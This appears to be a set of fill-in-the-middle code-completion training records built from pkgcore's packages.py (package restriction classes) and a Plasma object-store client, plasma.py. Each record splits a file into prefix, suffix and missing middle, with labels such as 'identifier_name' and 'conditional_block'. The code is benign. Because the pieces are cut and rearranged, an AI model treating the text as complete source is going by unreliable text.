if any(x in attr_split for x in eargs):
return False
elif any("'%s'" % x in y for x in attr_split for y in eargs):
# this is fairly horrible; probably specific to cpython also.
# either way, does a lookup specifically for attr components
# in the string exception string, looking for 'attr' in the
# text.
# if it doesn't match, exception is thrown.
return False
logger.exception(
"caught unexpected exception accessing %s from %s, " "exception %s",
".".join(attr_split),
str(pkg),
str(exc),
)
return True
def force_False(self, pkg):
attr = self._pull_attr(pkg)
if attr is klass.sentinel:
return not self.negate
if self.negate:
return self.restriction.force_True(pkg, self.attr, attr)
return self.restriction.force_False(pkg, self.attr, attr)
def force_True(self, pkg):
attr = self._pull_attr(pkg)
if attr is klass.sentinel:
return self.negate
if self.negate:
return self.restriction.force_False(pkg, self.attr, attr)
return self.restriction.force_True(pkg, self.attr, attr)
def __len__(self):
if not isinstance(self.restriction, boolean.base):
return 1
return len(self.restriction) + 1
def __hash__(self):
return hash((self.negate, self.attrs, self.restriction))
def __str__(self):
s = f"{self.attrs} "
if self.negate:
s += "not "
return s + str(self.restriction)
def __repr__(self):
if self.negate:
string = "<%s attr=%r restriction=%r negated @%#8x>"
else:
string = "<%s attr=%r restriction=%r @%#8x>"
return string % (self.__class__.__name__, self.attr, self.restriction, id(self))
@property
def attr(self):
return ".".join(self._attr_split)
@property
def attrs(self):
return (self.attr,)
class | (PackageRestriction):
__slots__ = ()
__inst_caching__ = True
attr = None
def force_False(self, pkg):
attrs = self._pull_attr(pkg)
if attrs is klass.sentinel:
return not self.negate
if self.negate:
return self.restriction.force_True(pkg, self.attrs, attrs)
return self.restriction.force_False(pkg, self.attrs, attrs)
def force_True(self, pkg):
attrs = self._pull_attr(pkg)
if attrs is klass.sentinel:
return self.negate
if self.negate:
return self.restriction.force_False(pkg, self.attrs, attrs)
return self.restriction.force_True(pkg, self.attrs, attrs)
@property
def attrs(self):
return tuple(".".join(x) for x in self._attr_split)
def _parse_attr(self, attrs):
object.__setattr__(
self, "_pull_attr_func", tuple(map(static_attrgetter, attrs))
)
object.__setattr__(self, "_attr_split", tuple(x.split(".") for x in attrs))
def _pull_attr(self, pkg):
val = []
try:
for attr_func in self._pull_attr_func:
val.append(attr_func(pkg))
except IGNORED_EXCEPTIONS:
raise
except Exception as e:
if self._handle_exception(pkg, e, self._attr_split[len(val)]):
raise
return klass.sentinel
return val
__hash__ = PackageRestriction.__hash__
__eq__ = PackageRestriction.__eq__
class Conditional(PackageRestriction, metaclass=generic_equality):
"""Base object representing a conditional package restriction.
Used to control whether a payload of restrictions are accessible or not.
"""
__slots__ = ("payload",)
__attr_comparison__ = ("__class__", "negate", "attr", "restriction", "payload")
conditional = True
# note that instance caching is turned off.
# rarely pays off for conditionals from a speed/mem comparison
def __init__(self, attr, childrestriction, payload, **kwds):
"""
:param attr: attr to match against
:param childrestriction: restriction to control whether or not the
payload is accessible
:param payload: payload data, whatever it may be.
:param kwds: additional args to pass to :obj:`PackageRestriction`
"""
PackageRestriction.__init__(self, attr, childrestriction, **kwds)
object.__setattr__(self, "payload", tuple(payload))
def __str__(self):
s = PackageRestriction.__str__(self)
payload = ", ".join(str(x) for x in self.payload)
return f"( Conditional: {s} payload: [ {payload} ] )"
def __repr__(self):
if self.negate:
string = "<%s attr=%r restriction=%r payload=%r negated @%#8x>"
else:
string = "<%s attr=%r restriction=%r payload=%r @%#8x>"
return string % (
self.__class__.__name__,
self.attr,
self.restriction,
self.payload,
id(self),
)
def __iter__(self):
return iter(self.payload)
def __hash__(self):
return hash((self.attr, self.negate, self.restriction, self.payload))
def evaluate_conditionals(
self, parent_cls, parent_seq, enabled, tristate_locked=None
):
if tristate_locked is not None:
assert len(self.restriction.vals) == 1
val = list(self.restriction.vals)[0]
if val in tristate_locked:
# if val is forced true, but the check is
# negation ignore it
# if !mips != mips
if (val in enabled) == self.restriction.negate:
return
elif not self.restriction.match(enabled):
return
if self.payload:
boolean.AndRestriction(*self.payload).evaluate_conditionals(
parent_cls, parent_seq, enabled, tristate_locked
)
# "Invalid name" (pylint uses the module const regexp, not the class regexp)
# pylint: disable-msg=C0103
AndRestriction = restriction.curry_node_type(
boolean.AndRestriction, restriction.package_type
)
OrRestriction = restriction.curry_node_type(
boolean.OrRestriction, restriction.package_type
)
AlwaysBool = restriction.curry_node_type(
restriction.AlwaysBool, restriction.package_type
)
class KeyedAndRestriction(boolean.AndRestriction):
__inst_caching__ = True
type = restriction.package_type
def __init__(self, *a, **kwds):
key = kwds.pop("key", None)
tag = kwds.pop("tag", None)
boolean.AndRestriction.__init__(self, *a, **kwds)
object.__setattr__(self, "key", key)
object.__setattr__(self, "tag", tag)
def __str__(self):
boolean_str = boolean.AndRestriction.__str__(self)
if self.tag is None:
return boolean_str
return f"{self.tag} {boolean_str}"
AlwaysTrue = AlwaysBool(negate=True)
AlwaysFalse = AlwaysBool(negate=False)
| PackageRestrictionMulti | identifier_name |
packages.py | """
restriction classes designed for package level matching
"""
from snakeoil import klass
from snakeoil.compatibility import IGNORED_EXCEPTIONS
from snakeoil.klass import generic_equality, static_attrgetter
from ..log import logger
from . import boolean, restriction
class PackageRestriction(restriction.base, metaclass=generic_equality):
"""Package data restriction."""
__slots__ = (
"_pull_attr_func",
"_attr_split",
"restriction",
"ignore_missing",
"negate",
)
__attr_comparison__ = ("__class__", "negate", "_attr_split", "restriction")
__inst_caching__ = True
type = restriction.package_type
subtype = restriction.value_type
conditional = False
# Note a sentinel is used purely because the codepath that use it
# can get executed a *lot*, and setup/tear down of exception
# machinery can be surprisingly costly
# Careful: some methods (__eq__, __hash__, intersect) try to work
# for subclasses too. They will not behave as intended if a
# subclass adds attributes. So if you do that, override the
# methods.
def __init__(self, attr, childrestriction, negate=False, ignore_missing=True):
"""
:param attr: package attribute to match against
:param childrestriction: a :obj:`pkgcore.restrictions.values.base` instance
to pass attr to for matching
:param negate: should the results be negated?
"""
if not childrestriction.type == self.subtype:
raise TypeError("restriction must be of type %r" % (self.subtype,))
sf = object.__setattr__
sf(self, "negate", negate)
self._parse_attr(attr)
sf(self, "restriction", childrestriction)
sf(self, "ignore_missing", ignore_missing)
def _parse_attr(self, attr):
object.__setattr__(self, "_pull_attr_func", static_attrgetter(attr))
object.__setattr__(self, "_attr_split", attr.split("."))
def _pull_attr(self, pkg):
try:
return self._pull_attr_func(pkg)
except IGNORED_EXCEPTIONS:
raise
except Exception as e:
if self._handle_exception(pkg, e, self._attr_split):
raise
return klass.sentinel
def match(self, pkg):
attr = self._pull_attr(pkg)
if attr is klass.sentinel:
return self.negate
return self.restriction.match(attr) != self.negate
def _handle_exception(self, pkg, exc, attr_split):
if isinstance(exc, AttributeError):
if not self.ignore_missing:
logger.exception(
"failed getting attribute %s from %s, " "exception %s",
".".join(attr_split),
str(pkg),
str(exc),
)
eargs = [x for x in exc.args if isinstance(x, str)]
if any(x in attr_split for x in eargs):
return False
elif any("'%s'" % x in y for x in attr_split for y in eargs):
# this is fairly horrible; probably specific to cpython also.
# either way, does a lookup specifically for attr components
# in the string exception string, looking for 'attr' in the
# text.
# if it doesn't match, exception is thrown.
return False
logger.exception(
"caught unexpected exception accessing %s from %s, " "exception %s",
".".join(attr_split),
str(pkg),
str(exc),
)
return True
def force_False(self, pkg):
attr = self._pull_attr(pkg)
if attr is klass.sentinel:
return not self.negate
if self.negate:
return self.restriction.force_True(pkg, self.attr, attr)
return self.restriction.force_False(pkg, self.attr, attr)
def force_True(self, pkg):
attr = self._pull_attr(pkg)
if attr is klass.sentinel:
return self.negate
if self.negate:
return self.restriction.force_False(pkg, self.attr, attr)
return self.restriction.force_True(pkg, self.attr, attr)
def __len__(self):
if not isinstance(self.restriction, boolean.base):
return 1
return len(self.restriction) + 1
def __hash__(self):
return hash((self.negate, self.attrs, self.restriction))
def __str__(self):
s = f"{self.attrs} "
if self.negate:
s += "not "
return s + str(self.restriction)
def __repr__(self):
if self.negate:
string = "<%s attr=%r restriction=%r negated @%#8x>"
else:
string = "<%s attr=%r restriction=%r @%#8x>"
return string % (self.__class__.__name__, self.attr, self.restriction, id(self))
@property
def attr(self):
return ".".join(self._attr_split)
@property
def attrs(self):
return (self.attr,)
class PackageRestrictionMulti(PackageRestriction):
__slots__ = ()
__inst_caching__ = True
attr = None
def force_False(self, pkg):
attrs = self._pull_attr(pkg)
if attrs is klass.sentinel:
return not self.negate
if self.negate:
return self.restriction.force_True(pkg, self.attrs, attrs)
return self.restriction.force_False(pkg, self.attrs, attrs)
def force_True(self, pkg):
|
@property
def attrs(self):
return tuple(".".join(x) for x in self._attr_split)
def _parse_attr(self, attrs):
object.__setattr__(
self, "_pull_attr_func", tuple(map(static_attrgetter, attrs))
)
object.__setattr__(self, "_attr_split", tuple(x.split(".") for x in attrs))
def _pull_attr(self, pkg):
val = []
try:
for attr_func in self._pull_attr_func:
val.append(attr_func(pkg))
except IGNORED_EXCEPTIONS:
raise
except Exception as e:
if self._handle_exception(pkg, e, self._attr_split[len(val)]):
raise
return klass.sentinel
return val
__hash__ = PackageRestriction.__hash__
__eq__ = PackageRestriction.__eq__
class Conditional(PackageRestriction, metaclass=generic_equality):
"""Base object representing a conditional package restriction.
Used to control whether a payload of restrictions are accessible or not.
"""
__slots__ = ("payload",)
__attr_comparison__ = ("__class__", "negate", "attr", "restriction", "payload")
conditional = True
# note that instance caching is turned off.
# rarely pays off for conditionals from a speed/mem comparison
def __init__(self, attr, childrestriction, payload, **kwds):
"""
:param attr: attr to match against
:param childrestriction: restriction to control whether or not the
payload is accessible
:param payload: payload data, whatever it may be.
:param kwds: additional args to pass to :obj:`PackageRestriction`
"""
PackageRestriction.__init__(self, attr, childrestriction, **kwds)
object.__setattr__(self, "payload", tuple(payload))
def __str__(self):
s = PackageRestriction.__str__(self)
payload = ", ".join(str(x) for x in self.payload)
return f"( Conditional: {s} payload: [ {payload} ] )"
def __repr__(self):
if self.negate:
string = "<%s attr=%r restriction=%r payload=%r negated @%#8x>"
else:
string = "<%s attr=%r restriction=%r payload=%r @%#8x>"
return string % (
self.__class__.__name__,
self.attr,
self.restriction,
self.payload,
id(self),
)
def __iter__(self):
return iter(self.payload)
def __hash__(self):
return hash((self.attr, self.negate, self.restriction, self.payload))
def evaluate_conditionals(
self, parent_cls, parent_seq, enabled, tristate_locked=None
):
if tristate_locked is not None:
assert len(self.restriction.vals) == 1
val = list(self.restriction.vals)[0]
if val in tristate_locked:
# if val is forced true, but the check is
# negation ignore it
# if !mips != mips
if (val in enabled) == self.restriction.negate:
return
elif not self.restriction.match(enabled):
return
if self.payload:
boolean.AndRestriction(*self.payload).evaluate_conditionals(
parent_cls, parent_seq, enabled, tristate_locked
)
# "Invalid name" (pylint uses the module const regexp, not the class regexp)
# pylint: disable-msg=C0103
AndRestriction = restriction.curry_node_type(
boolean.AndRestriction, restriction.package_type
)
OrRestriction = restriction.curry_node_type(
boolean.OrRestriction, restriction.package_type
)
AlwaysBool = restriction.curry_node_type(
restriction.AlwaysBool, restriction.package_type
)
class KeyedAndRestriction(boolean.AndRestriction):
__inst_caching__ = True
type = restriction.package_type
def __init__(self, *a, **kwds):
key = kwds.pop("key", None)
tag = kwds.pop("tag", None)
boolean.AndRestriction.__init__(self, *a, **kwds)
object.__setattr__(self, "key", key)
object.__setattr__(self, "tag", tag)
def __str__(self):
boolean_str = boolean.AndRestriction.__str__(self)
if self.tag is None:
return boolean_str
return f"{self.tag} {boolean_str}"
AlwaysTrue = AlwaysBool(negate=True)
AlwaysFalse = AlwaysBool(negate=False)
| attrs = self._pull_attr(pkg)
if attrs is klass.sentinel:
return self.negate
if self.negate:
return self.restriction.force_False(pkg, self.attrs, attrs)
return self.restriction.force_True(pkg, self.attrs, attrs) | identifier_body |
plasma.py | import os
import random
import socket
import subprocess
import time
import libplasma
PLASMA_ID_SIZE = 20
PLASMA_WAIT_TIMEOUT = 2 ** 30
class PlasmaBuffer(object):
"""This is the type of objects returned by calls to get with a PlasmaClient.
We define our own class instead of directly returning a buffer object so that
we can add a custom destructor which notifies Plasma that the object is no
longer being used, so the memory in the Plasma store backing the object can
potentially be freed.
Attributes:
buffer (buffer): A buffer containing an object in the Plasma store.
plasma_id (PlasmaID): The ID of the object in the buffer.
plasma_client (PlasmaClient): The PlasmaClient that we use to communicate
with the store and manager.
"""
def __init__(self, buff, plasma_id, plasma_client):
"""Initialize a PlasmaBuffer."""
self.buffer = buff
self.plasma_id = plasma_id
self.plasma_client = plasma_client
def __del__(self):
"""Notify Plasma that the object is no longer needed.
If the plasma client has been shut down, then don't do anything.
"""
if self.plasma_client.alive:
libplasma.release(self.plasma_client.conn, self.plasma_id)
def __getitem__(self, index):
"""Read from the PlasmaBuffer as if it were just a regular buffer."""
return self.buffer[index]
def __setitem__(self, index, value):
"""Write to the PlasmaBuffer as if it were just a regular buffer.
This should fail because the buffer should be read only.
"""
self.buffer[index] = value
def __len__(self):
"""Return the length of the buffer."""
return len(self.buffer)
class PlasmaClient(object):
"""The PlasmaClient is used to interface with a plasma store and a plasma manager.
The PlasmaClient can ask the PlasmaStore to allocate a new buffer, seal a
buffer, and get a buffer. Buffers are referred to by object IDs, which are
strings.
"""
def __init__(self, store_socket_name, manager_socket_name=None, release_delay=64):
"""Initialize the PlasmaClient.
Args:
store_socket_name (str): Name of the socket the plasma store is listening at.
manager_socket_name (str): Name of the socket the plasma manager is listening at.
"""
self.alive = True
if manager_socket_name is not None:
self.conn = libplasma.connect(store_socket_name, manager_socket_name, release_delay)
else:
self.conn = libplasma.connect(store_socket_name, "", release_delay)
def shutdown(self):
"""Shutdown the client so that it does not send messages.
If we kill the Plasma store and Plasma manager that this client is connected
to, then we can use this method to prevent the client from trying to send
messages to the killed processes.
"""
if self.alive:
libplasma.disconnect(self.conn)
self.alive = False
def create(self, object_id, size, metadata=None):
"""Create a new buffer in the PlasmaStore for a particular object ID.
The returned buffer is mutable until seal is called.
Args:
object_id (str): A string used to identify an object.
size (int): The size in bytes of the created buffer.
metadata (buffer): An optional buffer encoding whatever metadata the user
wishes to encode.
"""
# Turn the metadata into the right type.
metadata = bytearray("") if metadata is None else metadata
buff = libplasma.create(self.conn, object_id, size, metadata)
return PlasmaBuffer(buff, object_id, self)
def get(self, object_id):
"""Create a buffer from the PlasmaStore based on object ID.
If the object has not been sealed yet, this call will block. The retrieved
buffer is immutable.
Args:
object_id (str): A string used to identify an object.
"""
buff = libplasma.get(self.conn, object_id)[0]
return PlasmaBuffer(buff, object_id, self)
def get_metadata(self, object_id):
"""Create a buffer from the PlasmaStore based on object ID.
If the object has not been sealed yet, this call will block until the object
has been sealed. The retrieved buffer is immutable.
Args:
object_id (str): A string used to identify an object.
"""
buff = libplasma.get(self.conn, object_id)[1]
return PlasmaBuffer(buff, object_id, self)
def contains(self, object_id):
"""Check if the object is present and has been sealed in the PlasmaStore.
Args:
object_id (str): A string used to identify an object.
"""
return libplasma.contains(self.conn, object_id)
def seal(self, object_id):
"""Seal the buffer in the PlasmaStore for a particular object ID.
Once a buffer has been sealed, the buffer is immutable and can only be
accessed through get.
Args:
object_id (str): A string used to identify an object.
"""
libplasma.seal(self.conn, object_id)
def delete(self, object_id):
"""Delete the buffer in the PlasmaStore for a particular object ID.
Once a buffer has been deleted, the buffer is no longer accessible.
Args:
object_id (str): A string used to identify an object.
"""
libplasma.delete(self.conn, object_id)
def evict(self, num_bytes):
"""Evict some objects until to recover some bytes.
Recover at least num_bytes bytes if possible.
Args:
num_bytes (int): The number of bytes to attempt to recover.
"""
return libplasma.evict(self.conn, num_bytes)
def transfer(self, addr, port, object_id):
"""Transfer local object with id object_id to another plasma instance
Args:
addr (str): IPv4 address of the plasma instance the object is sent to.
port (int): Port number of the plasma instance the object is sent to.
object_id (str): A string used to identify an object.
"""
return libplasma.transfer(self.conn, object_id, addr, port)
def fetch(self, object_ids):
"""Fetch the object with id object_id from another plasma manager instance.
Args:
object_id (str): A string used to identify an object.
"""
return libplasma.fetch(self.conn, object_ids)
def wait(self, object_ids, timeout=PLASMA_WAIT_TIMEOUT, num_returns=1):
"""Wait until num_returns objects in object_ids are ready.
Args:
object_ids (List[str]): List of object IDs to wait for.
timeout (int): Return to the caller after timeout milliseconds.
num_returns (int): We are waiting for this number of objects to be ready.
Returns:
ready_ids, waiting_ids (List[str], List[str]): List of object IDs that
are ready and list of object IDs we might still wait on respectively.
"""
ready_ids, waiting_ids = libplasma.wait(self.conn, object_ids, timeout, num_returns)
return ready_ids, list(waiting_ids)
def subscribe(self):
"""Subscribe to notifications about sealed objects."""
fd = libplasma.subscribe(self.conn)
self.notification_sock = socket.fromfd(fd, socket.AF_UNIX, socket.SOCK_STREAM)
# Make the socket non-blocking.
self.notification_sock.setblocking(0)
def get_next_notification(self):
"""Get the next notification from the notification socket."""
if not self.notification_sock:
raise Exception("To get notifications, first call subscribe.")
# Loop until we've read PLASMA_ID_SIZE bytes from the socket.
while True:
try:
message_data = self.notification_sock.recv(PLASMA_ID_SIZE)
except socket.error:
time.sleep(0.001)
else:
assert len(message_data) == PLASMA_ID_SIZE
break
return message_data
DEFAULT_PLASMA_STORE_MEMORY = 10 ** 9
def random_name():
return str(random.randint(0, 99999999))
def start_plasma_store(plasma_store_memory=DEFAULT_PLASMA_STORE_MEMORY, use_valgrind=False, use_profiler=False):
"""Start a plasma store process.
Args:
use_valgrind (bool): True if the plasma store should be started inside of
valgrind. If this is True, use_profiler must be False.
use_profiler (bool): True if the plasma store should be started inside a
profiler. If this is True, use_valgrind must be False.
Return:
A tuple of the name of the plasma store socket and the process ID of the
plasma store process.
"""
if use_valgrind and use_profiler:
raise Exception("Cannot use valgrind and profiler at the same time.")
plasma_store_executable = os.path.join(os.path.abspath(os.path.dirname(__file__)), "../../build/plasma_store")
plasma_store_name = "/tmp/scheduler{}".format(random_name())
command = [plasma_store_executable, "-s", plasma_store_name, "-m", str(plasma_store_memory)]
if use_valgrind:
|
elif use_profiler:
pid = subprocess.Popen(["valgrind", "--tool=callgrind"] + command)
time.sleep(1.0)
else:
pid = subprocess.Popen(command)
time.sleep(0.1)
return plasma_store_name, pid
def start_plasma_manager(store_name, redis_address, num_retries=20, use_valgrind=False, run_profiler=False):
"""Start a plasma manager and return the ports it listens on.
Args:
store_name (str): The name of the plasma store socket.
redis_address (str): The address of the Redis server.
use_valgrind (bool): True if the Plasma manager should be started inside of
valgrind and False otherwise.
Returns:
A tuple of the Plasma manager socket name, the process ID of the Plasma
manager process, and the port that the manager is listening on.
Raises:
Exception: An exception is raised if the manager could not be started.
"""
plasma_manager_executable = os.path.join(os.path.abspath(os.path.dirname(__file__)), "../../build/plasma_manager")
plasma_manager_name = "/tmp/scheduler{}".format(random_name())
port = None
process = None
counter = 0
while counter < num_retries:
if counter > 0:
print("Plasma manager failed to start, retrying now.")
port = random.randint(10000, 65535)
command = [plasma_manager_executable,
"-s", store_name,
"-m", plasma_manager_name,
"-h", "127.0.0.1",
"-p", str(port),
"-r", redis_address]
if use_valgrind:
process = subprocess.Popen(["valgrind", "--track-origins=yes", "--leak-check=full", "--show-leak-kinds=all", "--error-exitcode=1"] + command)
elif run_profiler:
process = subprocess.Popen(["valgrind", "--tool=callgrind"] + command)
else:
process = subprocess.Popen(command)
# This sleep is critical. If the plasma_manager fails to start because the
# port is already in use, then we need it to fail within 0.1 seconds.
time.sleep(0.1)
# See if the process has terminated
if process.poll() == None:
return plasma_manager_name, process, port
counter += 1
raise Exception("Couldn't start plasma manager.")
| pid = subprocess.Popen(["valgrind", "--track-origins=yes", "--leak-check=full", "--show-leak-kinds=all", "--error-exitcode=1"] + command)
time.sleep(1.0) | conditional_block |
plasma.py | import os
import random
import socket
import subprocess
import time
import libplasma
PLASMA_ID_SIZE = 20
PLASMA_WAIT_TIMEOUT = 2 ** 30
class PlasmaBuffer(object):
"""This is the type of objects returned by calls to get with a PlasmaClient.
We define our own class instead of directly returning a buffer object so that
we can add a custom destructor which notifies Plasma that the object is no
longer being used, so the memory in the Plasma store backing the object can
potentially be freed.
Attributes:
buffer (buffer): A buffer containing an object in the Plasma store.
plasma_id (PlasmaID): The ID of the object in the buffer.
plasma_client (PlasmaClient): The PlasmaClient that we use to communicate
with the store and manager.
"""
def __init__(self, buff, plasma_id, plasma_client):
"""Initialize a PlasmaBuffer."""
self.buffer = buff
self.plasma_id = plasma_id
self.plasma_client = plasma_client
def __del__(self):
"""Notify Plasma that the object is no longer needed.
If the plasma client has been shut down, then don't do anything.
"""
if self.plasma_client.alive:
libplasma.release(self.plasma_client.conn, self.plasma_id)
def __getitem__(self, index):
"""Read from the PlasmaBuffer as if it were just a regular buffer."""
return self.buffer[index]
def __setitem__(self, index, value):
"""Write to the PlasmaBuffer as if it were just a regular buffer.
This should fail because the buffer should be read only.
"""
self.buffer[index] = value
def __len__(self):
"""Return the length of the buffer."""
return len(self.buffer)
class PlasmaClient(object):
"""The PlasmaClient is used to interface with a plasma store and a plasma manager.
The PlasmaClient can ask the PlasmaStore to allocate a new buffer, seal a
buffer, and get a buffer. Buffers are referred to by object IDs, which are
strings.
"""
def __init__(self, store_socket_name, manager_socket_name=None, release_delay=64):
"""Initialize the PlasmaClient.
Args:
store_socket_name (str): Name of the socket the plasma store is listening at.
manager_socket_name (str): Name of the socket the plasma manager is listening at.
"""
self.alive = True
if manager_socket_name is not None:
self.conn = libplasma.connect(store_socket_name, manager_socket_name, release_delay)
else:
self.conn = libplasma.connect(store_socket_name, "", release_delay)
def shutdown(self):
"""Shutdown the client so that it does not send messages.
If we kill the Plasma store and Plasma manager that this client is connected
to, then we can use this method to prevent the client from trying to send
messages to the killed processes.
"""
if self.alive:
libplasma.disconnect(self.conn)
self.alive = False
def create(self, object_id, size, metadata=None):
"""Create a new buffer in the PlasmaStore for a particular object ID.
The returned buffer is mutable until seal is called.
Args:
object_id (str): A string used to identify an object.
size (int): The size in bytes of the created buffer.
metadata (buffer): An optional buffer encoding whatever metadata the user
wishes to encode.
"""
# Turn the metadata into the right type.
metadata = bytearray("") if metadata is None else metadata
buff = libplasma.create(self.conn, object_id, size, metadata)
return PlasmaBuffer(buff, object_id, self)
def | (self, object_id):
"""Create a buffer from the PlasmaStore based on object ID.
If the object has not been sealed yet, this call will block. The retrieved
buffer is immutable.
Args:
object_id (str): A string used to identify an object.
"""
buff = libplasma.get(self.conn, object_id)[0]
return PlasmaBuffer(buff, object_id, self)
def get_metadata(self, object_id):
"""Create a buffer from the PlasmaStore based on object ID.
If the object has not been sealed yet, this call will block until the object
has been sealed. The retrieved buffer is immutable.
Args:
object_id (str): A string used to identify an object.
"""
buff = libplasma.get(self.conn, object_id)[1]
return PlasmaBuffer(buff, object_id, self)
def contains(self, object_id):
"""Check if the object is present and has been sealed in the PlasmaStore.
Args:
object_id (str): A string used to identify an object.
"""
return libplasma.contains(self.conn, object_id)
def seal(self, object_id):
"""Seal the buffer in the PlasmaStore for a particular object ID.
Once a buffer has been sealed, the buffer is immutable and can only be
accessed through get.
Args:
object_id (str): A string used to identify an object.
"""
libplasma.seal(self.conn, object_id)
def delete(self, object_id):
"""Delete the buffer in the PlasmaStore for a particular object ID.
Once a buffer has been deleted, the buffer is no longer accessible.
Args:
object_id (str): A string used to identify an object.
"""
libplasma.delete(self.conn, object_id)
def evict(self, num_bytes):
"""Evict some objects until to recover some bytes.
Recover at least num_bytes bytes if possible.
Args:
num_bytes (int): The number of bytes to attempt to recover.
"""
return libplasma.evict(self.conn, num_bytes)
def transfer(self, addr, port, object_id):
"""Transfer local object with id object_id to another plasma instance
Args:
addr (str): IPv4 address of the plasma instance the object is sent to.
port (int): Port number of the plasma instance the object is sent to.
object_id (str): A string used to identify an object.
"""
return libplasma.transfer(self.conn, object_id, addr, port)
def fetch(self, object_ids):
"""Fetch the object with id object_id from another plasma manager instance.
Args:
object_id (str): A string used to identify an object.
"""
return libplasma.fetch(self.conn, object_ids)
def wait(self, object_ids, timeout=PLASMA_WAIT_TIMEOUT, num_returns=1):
"""Wait until num_returns objects in object_ids are ready.
Args:
object_ids (List[str]): List of object IDs to wait for.
timeout (int): Return to the caller after timeout milliseconds.
num_returns (int): We are waiting for this number of objects to be ready.
Returns:
ready_ids, waiting_ids (List[str], List[str]): List of object IDs that
are ready and list of object IDs we might still wait on respectively.
"""
ready_ids, waiting_ids = libplasma.wait(self.conn, object_ids, timeout, num_returns)
return ready_ids, list(waiting_ids)
def subscribe(self):
"""Subscribe to notifications about sealed objects."""
fd = libplasma.subscribe(self.conn)
self.notification_sock = socket.fromfd(fd, socket.AF_UNIX, socket.SOCK_STREAM)
# Make the socket non-blocking.
self.notification_sock.setblocking(0)
def get_next_notification(self):
"""Get the next notification from the notification socket."""
if not self.notification_sock:
raise Exception("To get notifications, first call subscribe.")
# Loop until we've read PLASMA_ID_SIZE bytes from the socket.
while True:
try:
message_data = self.notification_sock.recv(PLASMA_ID_SIZE)
except socket.error:
time.sleep(0.001)
else:
assert len(message_data) == PLASMA_ID_SIZE
break
return message_data
DEFAULT_PLASMA_STORE_MEMORY = 10 ** 9
def random_name():
return str(random.randint(0, 99999999))
def start_plasma_store(plasma_store_memory=DEFAULT_PLASMA_STORE_MEMORY, use_valgrind=False, use_profiler=False):
"""Start a plasma store process.
Args:
use_valgrind (bool): True if the plasma store should be started inside of
valgrind. If this is True, use_profiler must be False.
use_profiler (bool): True if the plasma store should be started inside a
profiler. If this is True, use_valgrind must be False.
Return:
A tuple of the name of the plasma store socket and the process ID of the
plasma store process.
"""
if use_valgrind and use_profiler:
raise Exception("Cannot use valgrind and profiler at the same time.")
plasma_store_executable = os.path.join(os.path.abspath(os.path.dirname(__file__)), "../../build/plasma_store")
plasma_store_name = "/tmp/scheduler{}".format(random_name())
command = [plasma_store_executable, "-s", plasma_store_name, "-m", str(plasma_store_memory)]
if use_valgrind:
pid = subprocess.Popen(["valgrind", "--track-origins=yes", "--leak-check=full", "--show-leak-kinds=all", "--error-exitcode=1"] + command)
time.sleep(1.0)
elif use_profiler:
pid = subprocess.Popen(["valgrind", "--tool=callgrind"] + command)
time.sleep(1.0)
else:
pid = subprocess.Popen(command)
time.sleep(0.1)
return plasma_store_name, pid
def start_plasma_manager(store_name, redis_address, num_retries=20, use_valgrind=False, run_profiler=False):
"""Start a plasma manager and return the ports it listens on.
Args:
store_name (str): The name of the plasma store socket.
redis_address (str): The address of the Redis server.
use_valgrind (bool): True if the Plasma manager should be started inside of
valgrind and False otherwise.
Returns:
A tuple of the Plasma manager socket name, the process ID of the Plasma
manager process, and the port that the manager is listening on.
Raises:
Exception: An exception is raised if the manager could not be started.
"""
plasma_manager_executable = os.path.join(os.path.abspath(os.path.dirname(__file__)), "../../build/plasma_manager")
plasma_manager_name = "/tmp/scheduler{}".format(random_name())
port = None
process = None
counter = 0
while counter < num_retries:
if counter > 0:
print("Plasma manager failed to start, retrying now.")
port = random.randint(10000, 65535)
command = [plasma_manager_executable,
"-s", store_name,
"-m", plasma_manager_name,
"-h", "127.0.0.1",
"-p", str(port),
"-r", redis_address]
if use_valgrind:
process = subprocess.Popen(["valgrind", "--track-origins=yes", "--leak-check=full", "--show-leak-kinds=all", "--error-exitcode=1"] + command)
elif run_profiler:
process = subprocess.Popen(["valgrind", "--tool=callgrind"] + command)
else:
process = subprocess.Popen(command)
# This sleep is critical. If the plasma_manager fails to start because the
# port is already in use, then we need it to fail within 0.1 seconds.
time.sleep(0.1)
# See if the process has terminated
if process.poll() == None:
return plasma_manager_name, process, port
counter += 1
raise Exception("Couldn't start plasma manager.")
| get | identifier_name |
plasma.py | import os
import random
import socket
import subprocess
import time
import libplasma
PLASMA_ID_SIZE = 20
PLASMA_WAIT_TIMEOUT = 2 ** 30
class PlasmaBuffer(object):
"""This is the type of objects returned by calls to get with a PlasmaClient.
We define our own class instead of directly returning a buffer object so that
we can add a custom destructor which notifies Plasma that the object is no
longer being used, so the memory in the Plasma store backing the object can
potentially be freed.
Attributes:
buffer (buffer): A buffer containing an object in the Plasma store.
plasma_id (PlasmaID): The ID of the object in the buffer.
plasma_client (PlasmaClient): The PlasmaClient that we use to communicate
with the store and manager.
"""
def __init__(self, buff, plasma_id, plasma_client):
"""Initialize a PlasmaBuffer."""
self.buffer = buff
self.plasma_id = plasma_id
self.plasma_client = plasma_client
def __del__(self):
"""Notify Plasma that the object is no longer needed.
If the plasma client has been shut down, then don't do anything.
"""
if self.plasma_client.alive:
libplasma.release(self.plasma_client.conn, self.plasma_id)
def __getitem__(self, index):
"""Read from the PlasmaBuffer as if it were just a regular buffer."""
return self.buffer[index]
def __setitem__(self, index, value):
"""Write to the PlasmaBuffer as if it were just a regular buffer.
This should fail because the buffer should be read only.
"""
self.buffer[index] = value
def __len__(self):
"""Return the length of the buffer."""
return len(self.buffer)
class PlasmaClient(object):
"""The PlasmaClient is used to interface with a plasma store and a plasma manager.
The PlasmaClient can ask the PlasmaStore to allocate a new buffer, seal a
buffer, and get a buffer. Buffers are referred to by object IDs, which are
strings.
"""
def __init__(self, store_socket_name, manager_socket_name=None, release_delay=64):
"""Initialize the PlasmaClient.
Args:
store_socket_name (str): Name of the socket the plasma store is listening at.
manager_socket_name (str): Name of the socket the plasma manager is listening at.
"""
self.alive = True
if manager_socket_name is not None:
self.conn = libplasma.connect(store_socket_name, manager_socket_name, release_delay)
else:
self.conn = libplasma.connect(store_socket_name, "", release_delay)
def shutdown(self):
"""Shutdown the client so that it does not send messages.
If we kill the Plasma store and Plasma manager that this client is connected
to, then we can use this method to prevent the client from trying to send
messages to the killed processes.
"""
if self.alive:
libplasma.disconnect(self.conn)
self.alive = False
def create(self, object_id, size, metadata=None):
"""Create a new buffer in the PlasmaStore for a particular object ID.
The returned buffer is mutable until seal is called.
Args:
object_id (str): A string used to identify an object.
size (int): The size in bytes of the created buffer.
metadata (buffer): An optional buffer encoding whatever metadata the user
wishes to encode.
"""
